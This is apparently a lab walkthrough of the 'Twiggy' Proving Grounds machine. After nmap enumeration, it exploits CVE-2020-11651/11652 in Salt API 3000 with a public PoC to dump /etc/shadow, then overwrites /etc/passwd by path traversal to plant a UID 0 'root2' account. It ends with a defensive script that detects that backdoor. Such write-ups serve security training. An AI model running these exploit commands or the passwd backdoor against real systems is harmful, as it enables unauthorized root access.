In this walkthrough, we will be going through the Twiggy room from Proving Grounds. This room is rated as Easy on the platform and it consists of exploiting CVE-2020-11652 and CVE-2020-11651 in Salt API 3000 in order to get root. So, let’s get started without any delay.
Machine Info:
| Field | Value |
| --- | --- |
| Title | Twiggy |
| IP address | 192.168.177.62 |
| Difficulty | Easy |
| OS | Linux |
| Description | Twiggy is an Easy Linux machine that requires exploitation of CVE-2020-11652 and CVE-2020-11651 in Salt API 3000 in order to get root. |
Enumeration:
- I started off with my regular nmap aggressive scan and a full TCP port scan. Found only three ports open – 22 (SSH) and 80, 8000 (HTTP).
```
$ sudo nmap -A 192.168.177.62
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-16 13:56 IST
Nmap scan report for 192.168.177.62
Host is up (0.18s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA)
|   256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA)
|_  256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519)
| vulners:
|   cpe:/a:openbsd:openssh:7.4:
|     EXPLOITPACK:98FE96309F9524B8C84C508837551A19  5.8  https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19  *EXPLOIT*
|     EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97  5.8  https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97  *EXPLOIT*
|     EDB-ID:46516  5.8  https://vulners.com/exploitdb/EDB-ID:46516  *EXPLOIT*
|     EDB-ID:46193  5.8  https://vulners.com/exploitdb/EDB-ID:46193  *EXPLOIT*
|     CVE-2019-6111  5.8  https://vulners.com/cve/CVE-2019-6111
|     1337DAY-ID-32328  5.8  https://vulners.com/zdt/1337DAY-ID-32328  *EXPLOIT*
|     1337DAY-ID-32009  5.8  https://vulners.com/zdt/1337DAY-ID-32009  *EXPLOIT*
|     SSH_ENUM  5.0  https://vulners.com/canvas/SSH_ENUM  *EXPLOIT*
|     PRION:CVE-2018-15919  5.0  https://vulners.com/prion/PRION:CVE-2018-15919
|     PRION:CVE-2018-15473  5.0  https://vulners.com/prion/PRION:CVE-2018-15473
|     PRION:CVE-2017-15906  5.0  https://vulners.com/prion/PRION:CVE-2017-15906
|     PACKETSTORM:150621  5.0  https://vulners.com/packetstorm/PACKETSTORM:150621  *EXPLOIT*
|     EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0  5.0  https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0  *EXPLOIT*
|     EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283  5.0  https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283  *EXPLOIT*
|     EDB-ID:45939  5.0  https://vulners.com/exploitdb/EDB-ID:45939  *EXPLOIT*
|     EDB-ID:45233  5.0  https://vulners.com/exploitdb/EDB-ID:45233  *EXPLOIT*
|     CVE-2018-15919  5.0  https://vulners.com/cve/CVE-2018-15919
|     CVE-2018-15473  5.0  https://vulners.com/cve/CVE-2018-15473
|     CVE-2017-15906  5.0  https://vulners.com/cve/CVE-2017-15906
|     CVE-2016-10708  5.0  https://vulners.com/cve/CVE-2016-10708
|     1337DAY-ID-31730  5.0  https://vulners.com/zdt/1337DAY-ID-31730  *EXPLOIT*
|     PRION:CVE-2019-16905  4.4  https://vulners.com/prion/PRION:CVE-2019-16905
|     CVE-2020-14145  4.3  https://vulners.com/cve/CVE-2020-14145
|     PRION:CVE-2019-6110  4.0  https://vulners.com/prion/PRION:CVE-2019-6110
|     PRION:CVE-2019-6109  4.0  https://vulners.com/prion/PRION:CVE-2019-6109
|     CVE-2019-6110  4.0  https://vulners.com/cve/CVE-2019-6110
|     CVE-2019-6109  4.0  https://vulners.com/cve/CVE-2019-6109
|     PRION:CVE-2019-6111  2.6  https://vulners.com/prion/PRION:CVE-2019-6111
|     PRION:CVE-2018-20685  2.6  https://vulners.com/prion/PRION:CVE-2018-20685
|     CVE-2018-20685  2.6  https://vulners.com/cve/CVE-2018-20685
|     PACKETSTORM:151227  0.0  https://vulners.com/packetstorm/PACKETSTORM:151227  *EXPLOIT*
|     MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-  0.0  https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-  *EXPLOIT*
|_    1337DAY-ID-30937  0.0  https://vulners.com/zdt/1337DAY-ID-30937  *EXPLOIT*
80/tcp   open  http    nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: Home | Mezzanine
8000/tcp open  http    nginx 1.16.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.16.1
|_http-title: Site doesn't have a title (application/json).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 4.9 (89%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 - 3.16 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   178.32 ms 192.168.45.1
2   178.29 ms 192.168.45.254
3   178.35 ms 192.168.251.1
4   179.09 ms 192.168.177.62

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.77 seconds
```

```
sudo nmap -sS -p- -T5 192.168.177.62
```
- Enumerated the web server running on port 80 and found that it is running the Mezzanine CMS.
- Found a login panel, but was unable to log in to it. Checked the website’s other functionality and found nothing juicy.
- Next, enumerated the web server running on port 8000 and found that it is serving an API endpoint.
- Intercepted the request via Burp Suite to analyze the API better. It returns a bunch of client names as JSON data. In the Response tab, the X-Upstream header shows us the API in use here – Salt-Api/3000-1.
Exploitation & Getting root:
- Looked online for any known exploit for the concerned API version and found that it is vulnerable to two CVEs that lead to arbitrary command execution – CVE-2020-11651 and CVE-2020-11652.
- Used the exploit below on the target in order to dump the contents of the /etc/shadow file via the vulnerable API.
Exploit: https://github.com/jasperla/CVE-2020-11651-poc
```
python3 exploit.py --master 192.168.177.62 -r /etc/shadow
root:$6$WT0RuvyM$WIZ6pBFcP7G4pz/jRYY/LBsdyFGIiP3SLl0p32mysET9sBMeNkDXXq52becLp69Q/Uaiu8H0GxQ31XjA8zImo/:18400:0:99999:7:::
bin:*:17834:0:99999:7:::
daemon:*:17834:0:99999:7:::
adm:*:17834:0:99999:7:::
lp:*:17834:0:99999:7:::
sync:*:17834:0:99999:7:::
shutdown:*:17834:0:99999:7:::
halt:*:17834:0:99999:7:::
mail:*:17834:0:99999:7:::
operator:*:17834:0:99999:7:::
games:*:17834:0:99999:7:::
ftp:*:17834:0:99999:7:::
nobody:*:17834:0:99999:7:::
systemd-network:!!:18400::::::
dbus:!!:18400::::::
polkitd:!!:18400::::::
sshd:!!:18400::::::
postfix:!!:18400::::::
chrony:!!:18400::::::
mezz:!!:18400::::::
nginx:!!:18400::::::
named:!!:18400::::::
```
- We will also dump the contents of the /etc/passwd file as required for the next step of exploitation.
```
python3 exploit.py --master 192.168.177.62 -r /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
mezz:x:997:995::/home/mezz:/bin/false
nginx:x:996:994:Nginx web server:/var/lib/nginx:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
```
- Used the unshadow utility to merge the two files into a single text file containing users and hashes, in a format that john can crack.
```
unshadow passwd.txt shadow.txt > hash.txt
```
- Next, tried to crack the password hashes in the file with john but was unable to do so. So, let’s pivot to a different attack technique.
- We will now generate a password for our new user named root2 which we will then add to the /etc/passwd file.
```
touch passwd
openssl passwd 1234
Wvwt8mKEPPGuw
```
Contents of the local passwd file, with the new root2 entry appended at the end:
```
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
mezz:x:997:995::/home/mezz:/bin/false
nginx:x:996:994:Nginx web server:/var/lib/nginx:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
root2:Wvwt8mKEPPGuw:0:0:root:/root:/bin/bash
```
- We will now use the same exploit to upload our generated passwd file, containing the new root user, over the /etc/passwd file on the target host.
```
python3 exploit.py --master 192.168.177.62 --upload-src passwd --upload-dest ../../../../../../etc/passwd
```
- Once the exploit has run, we log into the server via SSH as root2 and capture the root flag to mark the machine as complete.
```
ssh root2@192.168.177.62   # password: 1234
```
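The persistence step above leaves two tell-tale marks in /etc/passwd: a second UID 0 account, and a password hash sitting in the passwd file itself instead of in /etc/shadow. As an added defensive check (not part of the original walkthrough or the PoC), the script below audits a passwd dump for exactly that pattern; the sample input is constructed from the entries shown above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: a few entries from the dumped /etc/passwd above plus the
# root2 line the walkthrough appends before uploading the file back.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mezz:x:997:995::/home/mezz:/bin/false
root2:Wvwt8mKEPPGuw:0:0:root:/root:/bin/bash
"""

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}
SHADOWED = {"x", "*", "!", "!!"}               # password-field values that carry no hash
DES_CRYPT = re.compile(r"[./0-9A-Za-z]{13}")  # 13-char legacy crypt(3) DES hash


@dataclass
class Finding:
    user: str
    reason: str


def audit_passwd(text: str) -> list[Finding]:
    """Flag /etc/passwd entries that match the backdoor pattern used above."""
    findings: list[Finding] = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append(Finding(raw, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, shell = fields
        if pw == "":
            findings.append(Finding(name, "empty password field, no password required"))
        elif pw not in SHADOWED:
            # pam_unix only falls back to /etc/shadow when this field is "x", so a
            # hash placed here authenticates with no shadow entry at all.
            findings.append(Finding(name, "password hash stored in /etc/passwd, not shadowed"))
            if DES_CRYPT.fullmatch(pw):
                findings.append(Finding(name, "legacy DES crypt hash (weak, truncates at 8 chars)"))
        if uid == "0" and name != "root" and shell not in NOLOGIN_SHELLS:
            findings.append(Finding(name, "second UID 0 account with an interactive shell"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"{f.user}: {f.reason}")
```

On a live host, feed it the real file (`audit_passwd(open("/etc/passwd").read())`) and also compare the file's mtime and hash against your baseline, since the PoC overwrites the whole file rather than appending to it.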
Conclusion:
So that was “Twiggy” for you. We started off with a regular nmap scan and found 3 ports open – 22 (SSH) and 80, 8000 (HTTP). Enumerated the web server running on port 8000 and found that it is running a Salt-Api/3000-1 API endpoint. Looked online for any known exploit for the concerned API version and found that it is vulnerable to two CVEs that lead to arbitrary command execution – CVE-2020-11651 and CVE-2020-11652. Used the same to get root on the target. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.